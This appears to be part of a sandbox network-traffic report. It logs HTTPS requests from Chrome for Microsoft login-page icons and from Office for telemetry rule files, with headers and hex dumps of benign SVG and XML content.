                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120248Z-r178fb8d7656shmjhC1DFWu5kw00000002f0000000009tnr
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            23192.168.2.44976813.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: logincdn.msauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:46 GMT
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Content-Length: 276
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                                            Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                                                                                                                                                                                                            ETag: 0x8D79ED35591CF44
                                                                                                                                                                                                                                            x-ms-request-id: c42efe4b-e01e-005c-0b77-36960e000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120146Z-1749fc9bdbdhnf7rhC1DFWgd0n00000002g0000000007g20
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 79218156
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                                                                                                                                                                                            Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:49 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1388
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                                            x-ms-request-id: 9bdc8c39-b01e-003d-1ed2-2cd32c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120249Z-16547b76f7fcrtpchC1DFW52e80000000kp0000000006n16
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            24192.168.2.449771152.199.21.175443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:47 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: aadcdn.msftauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:48 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Age: 20240879
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:47 GMT
                                                                                                                                                                                                                                            Etag: 0x8DB5C3F4AC59B47
                                                                                                                                                                                                                                            Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                                                                                                                                                                                            Server: ECAcc (lhc/78BB)
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            Content-Length: 1636
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-11-14 12:01:48 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                                                                                                                                                                                                            Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            25192.168.2.44978113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:26 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                            Content-Length: 218853
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 03:39:40 GMT
                                                                                                                                                                                                                                            ETag: "0x8DD0394CDDBD898"
                                                                                                                                                                                                                                            x-ms-request-id: 406a0d50-a01e-0002-58e4-355074000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120226Z-16547b76f7fdf69shC1DFWcpd00000000kd000000000efcm
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
